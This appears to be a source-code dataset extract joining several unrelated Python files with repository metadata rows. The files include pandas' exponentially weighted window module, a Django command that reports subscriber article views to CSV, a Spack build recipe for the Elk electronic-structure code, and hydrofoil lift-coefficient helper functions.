n_feats = args.n_feats
kernel_size = 3
self.scale_idx = 0
act = nn.ReLU(True)
rgb_mean = (0.4488, 0.4371, 0.4040)
rgb_std = (1.0, 1.0, 1.0)
self.sub_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std)
m_head = [conv(args.n_colors, n_feats, kernel_size)]
self.pre_process = nn.ModuleList([
nn.Sequential(
common.ResBlock(conv, n_feats, 5, act=act),
common.ResBlock(conv, n_feats, 5, act=act)
) for _ in args.scale
])
m_body = [
common.ResBlock(
conv, n_feats, kernel_size, act=act
) for _ in range(n_resblocks)
]
m_body.append(conv(n_feats, n_feats, kernel_size))
self.upsample = nn.ModuleList([
common.Upsampler(
conv, s, n_feats, act=False
) for s in args.scale
])
m_tail = [conv(n_feats, args.n_colors, kernel_size)]
self.add_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std, 1)
self.head = nn.Sequential(*m_head)
self.body = nn.Sequential(*m_body)
self.tail = nn.Sequential(*m_tail)
def forward(self, x):
x = self.sub_mean(x)
x = self.head(x)
x = self.pre_process[self.scale_idx](x)
res = self.body(x)
res += x
x = self.upsample[self.scale_idx](res)
x = self.tail(x)
x = self.add_mean(x)
return x
def set_scale(self, scale_idx):
self.scale_idx = scale_idx
| 26.623188 | 78 | 0.567229 |
4a210d8b47e9b2d9f9e0ce35cec69e343cf853ad | 23,207 | py | Python | pandas/core/window/ewm.py | mujtahidalam/pandas | 526468c8fe6fc5157aaf2fce327c5ab2a3350f49 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2021-12-07T13:37:31.000Z | 2021-12-07T13:37:31.000Z | pandas/core/window/ewm.py | mujtahidalam/pandas | 526468c8fe6fc5157aaf2fce327c5ab2a3350f49 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/window/ewm.py | mujtahidalam/pandas | 526468c8fe6fc5157aaf2fce327c5ab2a3350f49 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | from __future__ import annotations
import datetime
from functools import partial
from textwrap import dedent
import warnings
import numpy as np
from pandas._libs.tslibs import Timedelta
import pandas._libs.window.aggregations as window_aggregations
from pandas._typing import (
Axis,
FrameOrSeries,
FrameOrSeriesUnion,
TimedeltaConvertibleTypes,
)
from pandas.compat.numpy import function as nv
from pandas.util._decorators import doc
from pandas.core.dtypes.common import is_datetime64_ns_dtype
from pandas.core.dtypes.missing import isna
import pandas.core.common as common # noqa: PDF018
from pandas.core.util.numba_ import maybe_use_numba
from pandas.core.window.common import zsqrt
from pandas.core.window.doc import (
_shared_docs,
args_compat,
create_section_header,
kwargs_compat,
template_header,
template_returns,
template_see_also,
)
from pandas.core.window.indexers import (
BaseIndexer,
ExponentialMovingWindowIndexer,
GroupbyIndexer,
)
from pandas.core.window.numba_ import generate_numba_groupby_ewma_func
from pandas.core.window.rolling import (
BaseWindow,
BaseWindowGroupby,
)
def get_center_of_mass(
comass: float | None,
span: float | None,
halflife: float | None,
alpha: float | None,
) -> float:
valid_count = common.count_not_none(comass, span, halflife, alpha)
if valid_count > 1:
raise ValueError("comass, span, halflife, and alpha are mutually exclusive")
# Convert to center of mass; domain checks ensure 0 < alpha <= 1
if comass is not None:
if comass < 0:
raise ValueError("comass must satisfy: comass >= 0")
elif span is not None:
if span < 1:
raise ValueError("span must satisfy: span >= 1")
comass = (span - 1) / 2
elif halflife is not None:
if halflife <= 0:
raise ValueError("halflife must satisfy: halflife > 0")
decay = 1 - np.exp(np.log(0.5) / halflife)
comass = 1 / decay - 1
elif alpha is not None:
if alpha <= 0 or alpha > 1:
raise ValueError("alpha must satisfy: 0 < alpha <= 1")
comass = (1 - alpha) / alpha
else:
raise ValueError("Must pass one of comass, span, halflife, or alpha")
return float(comass)
def _calculate_deltas(
times: str | np.ndarray | FrameOrSeries | None,
halflife: float | TimedeltaConvertibleTypes | None,
) -> np.ndarray:
"""
Return the diff of the times divided by the half-life. These values are used in
the calculation of the ewm mean.
Parameters
----------
times : str, np.ndarray, Series, default None
Times corresponding to the observations. Must be monotonically increasing
and ``datetime64[ns]`` dtype.
halflife : float, str, timedelta, optional
Half-life specifying the decay
Returns
-------
np.ndarray
Diff of the times divided by the half-life
"""
# error: Item "str" of "Union[str, ndarray, FrameOrSeries, None]" has no
# attribute "view"
# error: Item "None" of "Union[str, ndarray, FrameOrSeries, None]" has no
# attribute "view"
_times = np.asarray(
times.view(np.int64), dtype=np.float64 # type: ignore[union-attr]
)
_halflife = float(Timedelta(halflife).value)
return np.diff(_times) / _halflife
class ExponentialMovingWindow(BaseWindow):
r"""
Provide exponential weighted (EW) functions.
Available EW functions: ``mean()``, ``var()``, ``std()``, ``corr()``, ``cov()``.
Exactly one parameter: ``com``, ``span``, ``halflife``, or ``alpha`` must be
provided.
Parameters
----------
com : float, optional
Specify decay in terms of center of mass,
:math:`\alpha = 1 / (1 + com)`, for :math:`com \geq 0`.
span : float, optional
Specify decay in terms of span,
:math:`\alpha = 2 / (span + 1)`, for :math:`span \geq 1`.
halflife : float, str, timedelta, optional
Specify decay in terms of half-life,
:math:`\alpha = 1 - \exp\left(-\ln(2) / halflife\right)`, for
:math:`halflife > 0`.
If ``times`` is specified, the time unit (str or timedelta) over which an
observation decays to half its value. Only applicable to ``mean()``
and halflife value will not apply to the other functions.
.. versionadded:: 1.1.0
alpha : float, optional
Specify smoothing factor :math:`\alpha` directly,
:math:`0 < \alpha \leq 1`.
min_periods : int, default 0
Minimum number of observations in window required to have a value
(otherwise result is NA).
adjust : bool, default True
Divide by decaying adjustment factor in beginning periods to account
for imbalance in relative weightings (viewing EWMA as a moving average).
- When ``adjust=True`` (default), the EW function is calculated using weights
:math:`w_i = (1 - \alpha)^i`. For example, the EW moving average of the series
[:math:`x_0, x_1, ..., x_t`] would be:
.. math::
y_t = \frac{x_t + (1 - \alpha)x_{t-1} + (1 - \alpha)^2 x_{t-2} + ... + (1 -
\alpha)^t x_0}{1 + (1 - \alpha) + (1 - \alpha)^2 + ... + (1 - \alpha)^t}
- When ``adjust=False``, the exponentially weighted function is calculated
recursively:
.. math::
\begin{split}
y_0 &= x_0\\
y_t &= (1 - \alpha) y_{t-1} + \alpha x_t,
\end{split}
ignore_na : bool, default False
Ignore missing values when calculating weights; specify ``True`` to reproduce
pre-0.15.0 behavior.
- When ``ignore_na=False`` (default), weights are based on absolute positions.
For example, the weights of :math:`x_0` and :math:`x_2` used in calculating
the final weighted average of [:math:`x_0`, None, :math:`x_2`] are
:math:`(1-\alpha)^2` and :math:`1` if ``adjust=True``, and
:math:`(1-\alpha)^2` and :math:`\alpha` if ``adjust=False``.
- When ``ignore_na=True`` (reproducing pre-0.15.0 behavior), weights are based
on relative positions. For example, the weights of :math:`x_0` and :math:`x_2`
used in calculating the final weighted average of
[:math:`x_0`, None, :math:`x_2`] are :math:`1-\alpha` and :math:`1` if
``adjust=True``, and :math:`1-\alpha` and :math:`\alpha` if ``adjust=False``.
axis : {0, 1}, default 0
The axis to use. The value 0 identifies the rows, and 1
identifies the columns.
times : str, np.ndarray, Series, default None
.. versionadded:: 1.1.0
Times corresponding to the observations. Must be monotonically increasing and
``datetime64[ns]`` dtype.
If str, the name of the column in the DataFrame representing the times.
If 1-D array like, a sequence with the same shape as the observations.
Only applicable to ``mean()``.
Returns
-------
DataFrame
A Window sub-classed for the particular operation.
See Also
--------
rolling : Provides rolling window calculations.
expanding : Provides expanding transformations.
Notes
-----
More details can be found at:
:ref:`Exponentially weighted windows <window.exponentially_weighted>`.
Examples
--------
>>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
>>> df
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
>>> df.ewm(com=0.5).mean()
B
0 0.000000
1 0.750000
2 1.615385
3 1.615385
4 3.670213
Specifying ``times`` with a timedelta ``halflife`` when computing mean.
>>> times = ['2020-01-01', '2020-01-03', '2020-01-10', '2020-01-15', '2020-01-17']
>>> df.ewm(halflife='4 days', times=pd.DatetimeIndex(times)).mean()
B
0 0.000000
1 0.585786
2 1.523889
3 1.523889
4 3.233686
"""
_attributes = [
"com",
"span",
"halflife",
"alpha",
"min_periods",
"adjust",
"ignore_na",
"axis",
"times",
]
def __init__(
self,
obj: FrameOrSeries,
com: float | None = None,
span: float | None = None,
halflife: float | TimedeltaConvertibleTypes | None = None,
alpha: float | None = None,
min_periods: int = 0,
adjust: bool = True,
ignore_na: bool = False,
axis: Axis = 0,
times: str | np.ndarray | FrameOrSeries | None = None,
):
super().__init__(
obj=obj,
min_periods=max(int(min_periods), 1),
on=None,
center=False,
closed=None,
method="single",
axis=axis,
)
self.com = com
self.span = span
self.halflife = halflife
self.alpha = alpha
self.adjust = adjust
self.ignore_na = ignore_na
self.times = times
if self.times is not None:
if not self.adjust:
raise NotImplementedError("times is not supported with adjust=False.")
if isinstance(self.times, str):
self.times = self._selected_obj[self.times]
if not is_datetime64_ns_dtype(self.times):
raise ValueError("times must be datetime64[ns] dtype.")
# error: Argument 1 to "len" has incompatible type "Union[str, ndarray,
# FrameOrSeries, None]"; expected "Sized"
if len(self.times) != len(obj): # type: ignore[arg-type]
raise ValueError("times must be the same length as the object.")
if not isinstance(self.halflife, (str, datetime.timedelta)):
raise ValueError(
"halflife must be a string or datetime.timedelta object"
)
if isna(self.times).any():
raise ValueError("Cannot convert NaT values to integer")
self._deltas = _calculate_deltas(self.times, self.halflife)
# Halflife is no longer applicable when calculating COM
# But allow COM to still be calculated if the user passes other decay args
if common.count_not_none(self.com, self.span, self.alpha) > 0:
self._com = get_center_of_mass(self.com, self.span, None, self.alpha)
else:
self._com = 1.0
else:
if self.halflife is not None and isinstance(
self.halflife, (str, datetime.timedelta)
):
raise ValueError(
"halflife can only be a timedelta convertible argument if "
"times is not None."
)
# Without times, points are equally spaced
self._deltas = np.ones(max(len(self.obj) - 1, 0), dtype=np.float64)
self._com = get_center_of_mass(
# error: Argument 3 to "get_center_of_mass" has incompatible type
# "Union[float, Any, None, timedelta64, signedinteger[_64Bit]]";
# expected "Optional[float]"
self.com,
self.span,
self.halflife, # type: ignore[arg-type]
self.alpha,
)
def _get_window_indexer(self) -> BaseIndexer:
"""
Return an indexer class that will compute the window start and end bounds
"""
return ExponentialMovingWindowIndexer()
@doc(
_shared_docs["aggregate"],
see_also=dedent(
"""
See Also
--------
pandas.DataFrame.rolling.aggregate
"""
),
examples=dedent(
"""
Examples
--------
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6], "C": [7, 8, 9]})
>>> df
A B C
0 1 4 7
1 2 5 8
2 3 6 9
>>> df.ewm(alpha=0.5).mean()
A B C
0 1.000000 4.000000 7.000000
1 1.666667 4.666667 7.666667
2 2.428571 5.428571 8.428571
"""
),
klass="Series/Dataframe",
axis="",
)
def aggregate(self, func, *args, **kwargs):
return super().aggregate(func, *args, **kwargs)
agg = aggregate
@doc(
template_header,
create_section_header("Parameters"),
args_compat,
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) mean",
agg_method="mean",
)
def mean(self, *args, **kwargs):
nv.validate_window_func("mean", args, kwargs)
window_func = window_aggregations.ewma
window_func = partial(
window_func,
com=self._com,
adjust=self.adjust,
ignore_na=self.ignore_na,
deltas=self._deltas,
)
return self._apply(window_func)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
bias : bool, default False
Use a standard estimation bias correction.
"""
).replace("\n", "", 1),
args_compat,
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) standard deviation",
agg_method="std",
)
def std(self, bias: bool = False, *args, **kwargs):
nv.validate_window_func("std", args, kwargs)
return zsqrt(self.var(bias=bias, **kwargs))
def vol(self, bias: bool = False, *args, **kwargs):
warnings.warn(
(
"vol is deprecated will be removed in a future version. "
"Use std instead."
),
FutureWarning,
stacklevel=2,
)
return self.std(bias, *args, **kwargs)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
bias : bool, default False
Use a standard estimation bias correction.
"""
).replace("\n", "", 1),
args_compat,
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) variance",
agg_method="var",
)
def var(self, bias: bool = False, *args, **kwargs):
nv.validate_window_func("var", args, kwargs)
window_func = window_aggregations.ewmcov
wfunc = partial(
window_func,
com=self._com,
adjust=self.adjust,
ignore_na=self.ignore_na,
bias=bias,
)
def var_func(values, begin, end, min_periods):
return wfunc(values, begin, end, min_periods, values)
return self._apply(var_func)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
other : Series or DataFrame , optional
If not supplied then will default to self and produce pairwise
output.
pairwise : bool, default None
If False then only matching columns between self and other will be
used and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndex DataFrame in the case of DataFrame
inputs. In the case of missing elements, only complete pairwise
observations will be used.
bias : bool, default False
Use a standard estimation bias correction.
"""
).replace("\n", "", 1),
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) sample covariance",
agg_method="cov",
)
def cov(
self,
other: FrameOrSeriesUnion | None = None,
pairwise: bool | None = None,
bias: bool = False,
**kwargs,
):
from pandas import Series
def cov_func(x, y):
x_array = self._prep_values(x)
y_array = self._prep_values(y)
window_indexer = self._get_window_indexer()
min_periods = (
self.min_periods
if self.min_periods is not None
else window_indexer.window_size
)
start, end = window_indexer.get_window_bounds(
num_values=len(x_array),
min_periods=min_periods,
center=self.center,
closed=self.closed,
)
result = window_aggregations.ewmcov(
x_array,
start,
end,
# error: Argument 4 to "ewmcov" has incompatible type
# "Optional[int]"; expected "int"
self.min_periods, # type: ignore[arg-type]
y_array,
self._com,
self.adjust,
self.ignore_na,
bias,
)
return Series(result, index=x.index, name=x.name)
return self._apply_pairwise(self._selected_obj, other, pairwise, cov_func)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
other : Series or DataFrame, optional
If not supplied then will default to self and produce pairwise
output.
pairwise : bool, default None
If False then only matching columns between self and other will be
used and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndex DataFrame in the case of DataFrame
inputs. In the case of missing elements, only complete pairwise
observations will be used.
"""
).replace("\n", "", 1),
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) sample correlation",
agg_method="corr",
)
def corr(
self,
other: FrameOrSeriesUnion | None = None,
pairwise: bool | None = None,
**kwargs,
):
from pandas import Series
def cov_func(x, y):
x_array = self._prep_values(x)
y_array = self._prep_values(y)
window_indexer = self._get_window_indexer()
min_periods = (
self.min_periods
if self.min_periods is not None
else window_indexer.window_size
)
start, end = window_indexer.get_window_bounds(
num_values=len(x_array),
min_periods=min_periods,
center=self.center,
closed=self.closed,
)
def _cov(X, Y):
return window_aggregations.ewmcov(
X,
start,
end,
min_periods,
Y,
self._com,
self.adjust,
self.ignore_na,
True,
)
with np.errstate(all="ignore"):
cov = _cov(x_array, y_array)
x_var = _cov(x_array, x_array)
y_var = _cov(y_array, y_array)
result = cov / zsqrt(x_var * y_var)
return Series(result, index=x.index, name=x.name)
return self._apply_pairwise(self._selected_obj, other, pairwise, cov_func)
class ExponentialMovingWindowGroupby(BaseWindowGroupby, ExponentialMovingWindow):
"""
Provide an exponential moving window groupby implementation.
"""
_attributes = ExponentialMovingWindow._attributes + BaseWindowGroupby._attributes
def __init__(self, obj, *args, _grouper=None, **kwargs):
super().__init__(obj, *args, _grouper=_grouper, **kwargs)
if not obj.empty and self.times is not None:
# sort the times and recalculate the deltas according to the groups
groupby_order = np.concatenate(list(self._grouper.indices.values()))
self._deltas = _calculate_deltas(
self.times.take(groupby_order), # type: ignore[union-attr]
self.halflife,
)
def _get_window_indexer(self) -> GroupbyIndexer:
"""
Return an indexer class that will compute the window start and end bounds
Returns
-------
GroupbyIndexer
"""
window_indexer = GroupbyIndexer(
groupby_indicies=self._grouper.indices,
window_indexer=ExponentialMovingWindowIndexer,
)
return window_indexer
def mean(self, engine=None, engine_kwargs=None):
"""
Parameters
----------
engine : str, default None
* ``'cython'`` : Runs mean through C-extensions from cython.
* ``'numba'`` : Runs mean through JIT compiled code from numba.
Only available when ``raw`` is set to ``True``.
* ``None`` : Defaults to ``'cython'`` or globally setting
``compute.use_numba``
.. versionadded:: 1.2.0
engine_kwargs : dict, default None
* For ``'cython'`` engine, there are no accepted ``engine_kwargs``
* For ``'numba'`` engine, the engine can accept ``nopython``, ``nogil``
and ``parallel`` dictionary keys. The values must either be ``True`` or
``False``. The default ``engine_kwargs`` for the ``'numba'`` engine is
``{'nopython': True, 'nogil': False, 'parallel': False}``.
.. versionadded:: 1.2.0
Returns
-------
Series or DataFrame
Return type is determined by the caller.
"""
if maybe_use_numba(engine):
groupby_ewma_func = generate_numba_groupby_ewma_func(
engine_kwargs, self._com, self.adjust, self.ignore_na, self._deltas
)
return self._apply(
groupby_ewma_func,
numba_cache_key=(lambda x: x, "groupby_ewma"),
)
elif engine in ("cython", None):
if engine_kwargs is not None:
raise ValueError("cython engine does not accept engine_kwargs")
return super().mean()
else:
raise ValueError("engine must be either 'numba' or 'cython'")
| 34.127941 | 88 | 0.570345 |
4a210ed80ec28506cd5e01cab09101738d8d7d22 | 4,840 | py | Python | portal/apps/dashboard/management/commands/subscribers.py | djpeluca/utopia-cms | 1e444afea565fdc734abf449b8ebe9b7c2c47d80 | [
"BSD-3-Clause"
] | 8 | 2020-12-15T17:11:08.000Z | 2021-12-13T22:08:33.000Z | portal/apps/dashboard/management/commands/subscribers.py | djpeluca/utopia-cms | 1e444afea565fdc734abf449b8ebe9b7c2c47d80 | [
"BSD-3-Clause"
] | 28 | 2020-12-15T17:34:03.000Z | 2022-02-01T04:09:10.000Z | portal/apps/dashboard/management/commands/subscribers.py | djpeluca/utopia-cms | 1e444afea565fdc734abf449b8ebe9b7c2c47d80 | [
"BSD-3-Clause"
] | 7 | 2020-12-15T19:59:17.000Z | 2021-11-24T16:47:06.000Z | from os.path import join
from unicodecsv import writer
import operator
from progress.bar import Bar
from django.core.management.base import BaseCommand
from django.conf import settings
from core.models import Article, ArticleViewedBy, Publication, Section
class Command(BaseCommand):
help = u'Generates the articles report content for subscribers visits'
def add_arguments(self, parser):
parser.add_argument(
'--progress', action='store_true', default=False, dest='progress', help=u'Show a progress bar'
)
parser.add_argument(
'--published-since',
action='store',
type=unicode,
dest='published-since',
help='Only count visits of articles published at or after this date, in format : YYYY-mm-dd',
)
parser.add_argument(
'--views-since',
action='store',
type=unicode,
dest='views-since',
help='Only count visits at or after this date, in format : YYYY-mm-dd',
)
parser.add_argument(
'--out-prefix',
action='store',
type=unicode,
dest='out-prefix',
default=u'',
help=u"Don't make changes to existing files and save generated files with this prefix",
)
def handle(self, *args, **options):
published_since, views_since = options.get('published-since'), options.get('views-since')
filter_articles_kwargs = {'is_published': True, 'views__gt': 0}
filter_views_kwargs = {'user__is_staff': False, 'user__subscriber__isnull': False}
if published_since:
filter_articles_kwargs.update({'date_published__gte': published_since})
if views_since:
filter_views_kwargs.update({'viewed_at__gte': views_since})
verbosity = options.get('verbosity')
if verbosity > '1':
gen_msg = u'Generating reports for articles published '
gen_msg += ((u'since %s' % published_since) if published_since else u'on any date') + u' and views '
print(gen_msg + ((u'since %s' % views_since) if views_since else u'on any date')) + u' ...'
target_articles, articles, articles_sections = Article.objects.filter(**filter_articles_kwargs), [], {}
bar = Bar('Processing articles', max=target_articles.count()) if options.get('progress') else None
for article in target_articles.select_related('main_section__edition').iterator():
filter_views_kwargs.update({'article': article})
views, article_publications = 0, article.publications()
for article_view in ArticleViewedBy.objects.select_related(
'user__subscriber'
).filter(**filter_views_kwargs).iterator():
if (
article_view.user.subscriber.is_subscriber()
or any([article_view.user.subscriber.is_subscriber(p.slug) for p in article_publications])
):
views += 1
if views:
articles.append((article.id, views))
main_section = article.main_section
if main_section:
main_publication_id = main_section.edition.publication_id
main_section_id = main_section.section_id
section_views = articles_sections.get((main_publication_id, main_section_id), 0)
section_views += views
articles_sections[(main_publication_id, main_section_id)] = section_views
if bar:
bar.next()
if bar:
bar.finish()
articles.sort(key=operator.itemgetter(1), reverse=True)
out_prefix = options.get('out-prefix')
w = writer(open(join(settings.DASHBOARD_REPORTS_PATH, '%ssubscribers.csv' % out_prefix), 'w'))
i = 0
for article_id, views in articles:
article = Article.objects.get(id=article_id)
i += 1
w.writerow(
[
i,
article.date_published.date(),
article.get_absolute_url(),
views,
', '.join(['%s' % ar for ar in article.articlerel_set.all()]),
]
)
as_list = [(p, s, v) for (p, s), v in articles_sections.iteritems()]
as_list.sort(key=operator.itemgetter(2), reverse=True)
w = writer(open(join(settings.DASHBOARD_REPORTS_PATH, '%ssubscribers_sections.csv' % out_prefix), 'w'))
i = 0
for publication_id, section_id, views in as_list:
i += 1
w.writerow(
[i, Publication.objects.get(id=publication_id).name, Section.objects.get(id=section_id).name, views]
)
| 39.672131 | 116 | 0.592769 |
4a210f85cc49bed7bee709d97c408a8b6b0596d6 | 190 | py | Python | Python_Challenge_115/2/6.py | LIkelion-at-KOREATECH/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | Python_Challenge_115/2/6.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | null | null | null | Python_Challenge_115/2/6.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | '''
Statement
Given a positive real number, print its first digit to the right of the decimal point.
Example input
1.79
Example output
7
'''
num = float(input())
print(int(num * 10 % 10))
| 14.615385 | 86 | 0.710526 |
4a210fe32805c8b31ebe4291d2d0e84af7434378 | 4,723 | py | Python | var/spack/repos/builtin/packages/elk/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2020-10-15T01:08:42.000Z | 2021-10-18T01:28:18.000Z | var/spack/repos/builtin/packages/elk/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2019-07-30T10:12:28.000Z | 2019-12-17T09:02:27.000Z | var/spack/repos/builtin/packages/elk/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2019-07-30T09:42:14.000Z | 2021-01-25T05:39:20.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Elk(MakefilePackage):
"""An all-electron full-potential linearised augmented-plane wave
(FP-LAPW) code with many advanced features."""
homepage = 'http://elk.sourceforge.net/'
url = 'https://sourceforge.net/projects/elk/files/elk-3.3.17.tgz'
version('3.3.17', sha256='c9b87ae4ef367ed43afc2d43eb961745668e40670995e8e24c13db41b7e85d73')
# Elk provides these libraries, but allows you to specify your own
variant('blas', default=True,
description='Build with custom BLAS library')
variant('lapack', default=True,
description='Build with custom LAPACK library')
variant('fft', default=True,
description='Build with custom FFT library')
# Elk does not provide these libraries, but allows you to use them
variant('mpi', default=True,
description='Enable MPI parallelism')
variant('openmp', default=True,
description='Enable OpenMP support')
variant('libxc', default=True,
description='Link to Libxc functional library')
depends_on('blas', when='+blas')
depends_on('lapack', when='+lapack')
depends_on('fftw', when='+fft')
depends_on('mpi@2:', when='+mpi')
depends_on('libxc', when='+libxc')
# Cannot be built in parallel
parallel = False
def edit(self, spec, prefix):
# Dictionary of configuration options
config = {
'MAKE': 'make',
'AR': 'ar'
}
# Compiler-specific flags
flags = ''
if self.compiler.name == 'intel':
flags = '-O3 -ip -unroll -no-prec-div'
elif self.compiler.name == 'gcc':
flags = '-O3 -ffast-math -funroll-loops'
elif self.compiler.name == 'pgi':
flags = '-O3 -lpthread'
elif self.compiler.name == 'g95':
flags = '-O3 -fno-second-underscore'
elif self.compiler.name == 'nag':
flags = '-O4 -kind=byte -dusty -dcfuns'
elif self.compiler.name == 'xl':
flags = '-O3'
config['F90_OPTS'] = flags
config['F77_OPTS'] = flags
# BLAS/LAPACK support
# Note: BLAS/LAPACK must be compiled with OpenMP support
# if the +openmp variant is chosen
blas = 'blas.a'
lapack = 'lapack.a'
if '+blas' in spec:
blas = spec['blas'].libs.joined()
if '+lapack' in spec:
lapack = spec['lapack'].libs.joined()
# lapack must come before blas
config['LIB_LPK'] = ' '.join([lapack, blas])
# FFT support
if '+fft' in spec:
config['LIB_FFT'] = join_path(spec['fftw'].prefix.lib,
'libfftw3.so')
config['SRC_FFT'] = 'zfftifc_fftw.f90'
else:
config['LIB_FFT'] = 'fftlib.a'
config['SRC_FFT'] = 'zfftifc.f90'
# MPI support
if '+mpi' in spec:
config['F90'] = spec['mpi'].mpifc
config['F77'] = spec['mpi'].mpif77
else:
config['F90'] = spack_fc
config['F77'] = spack_f77
config['SRC_MPI'] = 'mpi_stub.f90'
# OpenMP support
if '+openmp' in spec:
config['F90_OPTS'] += ' ' + self.compiler.openmp_flag
config['F77_OPTS'] += ' ' + self.compiler.openmp_flag
else:
config['SRC_OMP'] = 'omp_stub.f90'
# Libxc support
if '+libxc' in spec:
config['LIB_libxc'] = ' '.join([
join_path(spec['libxc'].prefix.lib, 'libxcf90.so'),
join_path(spec['libxc'].prefix.lib, 'libxc.so')
])
config['SRC_libxc'] = ' '.join([
'libxc_funcs.f90',
'libxc.f90',
'libxcifc.f90'
])
else:
config['SRC_libxc'] = 'libxcifc_stub.f90'
# Write configuration options to include file
with open('make.inc', 'w') as inc:
for key in config:
inc.write('{0} = {1}\n'.format(key, config[key]))
def install(self, spec, prefix):
# The Elk Makefile does not provide an install target
mkdir(prefix.bin)
install('src/elk', prefix.bin)
install('src/eos/eos', prefix.bin)
install('src/spacegroup/spacegroup', prefix.bin)
install_tree('examples', join_path(prefix, 'examples'))
install_tree('species', join_path(prefix, 'species'))
| 35.511278 | 96 | 0.556638 |
4a2110e2d23810e1a40ee3dc5ad16db0a2672457 | 2,963 | py | Python | solver/coeff_formulas.py | ggruszczynski/pyVLM | b4ddeae91969c77544117fef5c4ef81918f4f20b | [
"MIT"
] | 9 | 2018-06-10T02:09:22.000Z | 2022-01-11T16:25:55.000Z | solver/coeff_formulas.py | ggruszczynski/pyVLM | b4ddeae91969c77544117fef5c4ef81918f4f20b | [
"MIT"
] | 3 | 2018-02-26T07:11:59.000Z | 2020-05-08T11:37:18.000Z | solver/coeff_formulas.py | ggruszczynski/pyVLM | b4ddeae91969c77544117fef5c4ef81918f4f20b | [
"MIT"
] | null | null | null | import numpy as np
from scipy import interpolate
import warnings
def get_CL_CD_free_wing(AR, AoA_deg):
a0 = 2. * np.pi # dCL/d_alfa in 2D [1/rad]
e_w = 0.8 # span efficiency factor, range: 0.8 - 1.0
a = a0 / (1. + a0 / (np.pi * AR * e_w))
CL_expected_3d = a * np.deg2rad(AoA_deg)
CD_ind_expected_3d = CL_expected_3d * CL_expected_3d / (np.pi * AR * e_w)
return CL_expected_3d, CD_ind_expected_3d
def get_CL_CD_submerged_wing(AR, AoA_deg, K=1, c=0, h=0):
"""
:param AR:
:param AoA_deg:
:param K: coefficient accounting for free surface effects
on steady lift for an uncambered 2D thin foial at an angle of attack.
CL_with_free_surface_effects = CL * K
CL = 2. * np.pi
:return:
"""
a0 = 2. * np.pi * K # dCL/d_alfa in 2D [1/rad]
e_w = 0.8 # span efficiency factor, range: 0.8 - 1.0
a = a0 / (1. + a0 / (np.pi * AR * e_w))
CL_expected_3d = a * np.deg2rad(AoA_deg)
# CL_expected_3d = AR* 2*np.pi*np.deg2rad(AoA_deg)/(2+np.sqrt(AR*AR+4))
CD_ind_expected_3d = CL_expected_3d * CL_expected_3d / (np.pi * AR * e_w)
return CL_expected_3d, CD_ind_expected_3d
def calc_free_surface_effect_on_CL(Fn, h_over_chord):
"""
This functions returns coefficient 'K' accounting for free surface effects
on steady lift for an uncambered 2D thin foial at an angle of attack.
Source:
Hough and Moran 1969 (original)
"Hydrodynamics of High-Speed Marine Vehicles" Odd M. Faltinsen, chapter 6.8 p 199
CL_with_free_surface_effects = CL * K
:param Fn: Froude number with h as length parameter
:param h_over_chord: ratio of foil_submerge/MAC
:return:
"""
# h - foilsubmerge [m]
# MAC - mean aerodynamic chord [m]
if (h_over_chord > 1.1 or h_over_chord < 0.9):
raise ValueError("no data for foil submerge / foil chord other than 1")
# data below are for hc = h / c = 1
K = [1, 0.72, 0.6, 0.62, 0.65, 0.76, 0.85, 0.9, 0.91, 0.92] # [-] 2D free surface lift correction coefficient
Fnh = [0, 1, 1.5, 2, 2.5, 4, 6, 8, 10, 25] # Froude number with h as parameter
if (Fn < 9):
warnings.warn("To use mirror vortex modeling technique it is recommended to be in high Freud number regime.")
# source:
